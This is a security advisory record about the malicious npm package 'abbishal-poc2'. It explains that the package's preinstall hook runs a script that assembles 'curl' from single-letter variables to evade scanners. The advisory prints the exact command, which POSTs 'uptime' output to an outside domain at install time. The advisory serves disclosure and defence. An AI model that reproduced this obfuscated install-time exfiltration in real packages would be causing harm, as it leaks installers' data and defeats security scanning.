VDB
GCVE-110-OSM-2026-13419
GCVE-110-OSM-2026-13419
Advisory PublishedCVSS 8.8/10
package.json declares a preinstall script `sh./test.sh`. test.sh assembles the string `curl` from single-character shell variables (b=e, i=c, s=n, h=u, a=v, l=rl) and then invokes `$i$h$l -d "`uptime`" https://abbishal.com/sh/poc`, POSTing the output of `uptime` (and implicitly the installer's source IP) to abbishal.com at npm install time. The README claims the package has no install scripts and no network activity, directly contradicting the shipped behavior. The command-name obfuscation via per-letter variable assembly is a technique to evade static scanners searching for `curl` in lifecycle scripts, and the destination domain does not match the package's claimed publisher.
ENTRY
colours.scss (main: colours.scss)
- Preinstall Script in package.json: ""preinstall": "sh ./test.sh""
ADDITIONAL FINDINGS
- Publisher Has Other Malicious Packages
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | abbishal-poc2 | all (affected) | — |
Aliases
Browse GCVE Records
3,328 records in the GCVE database · Updated October 10, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.